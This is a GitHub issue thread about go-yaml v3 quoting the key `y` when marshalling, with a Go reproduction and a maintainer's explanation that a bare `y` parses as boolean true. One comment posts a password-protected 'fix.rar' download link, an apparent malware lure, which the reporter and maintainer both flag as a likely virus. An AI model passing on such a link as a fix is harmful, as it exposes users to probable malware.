### ISSUE TITLE
key y is given double quotes while unmarshalling

### ISSUE THREAD

**Issue by Jougan-0** [go-yaml/yaml#1044]
When marshalling if the key is `y` then it gets double quotes.
`https://go.dev/play/p/NsHSbui-Nah`
```
package main

import (
	"fmt"

	"gopkg.in/yaml.v3"
)

type Styles struct {
	Position *struct {
		X int64 `json:"x" yaml:"x"`
		Y int64 `json:"y" yaml:"y"`
	} `json:"position,omitempty" yaml:"position,omitempty"`
}

func main() {
	styles := Styles{
		Position: &struct {
			X int64 `json:"x" yaml:"x"`
			Y int64 `json:"y" yaml:"y"`
		}{
			X: 912,
			Y: 381,
		},
	}

	data, err := yaml.Marshal(&styles)
	if err != nil {
		fmt.Println("Error marshaling YAML:", err)
		return
	}

	fmt.Println(string(data))
}
```

Output
![image](https://github.com/user-attachments/assets/b7376ade-4891-4b26-a8d4-7d561595f56c)

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jougan-0** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

Why would I need you fix link ?

**Comment by liggitt** [comment]
> When marshalling if the key is y then it gets double quotes.


The behavior reported in this issue is required because a bare `y` is considered to be the boolean `true` value

**Comment by Jougan-0** [comment]
> This is required because a bare `y` is considered to be the boolean `true` value

Is the link right? I thought it is some kind of virus.

**Comment by liggitt** [comment]
Sorry... clarified... the behavior reported in this issue is required. I also suspect the link is a virus and would not recommend following it.
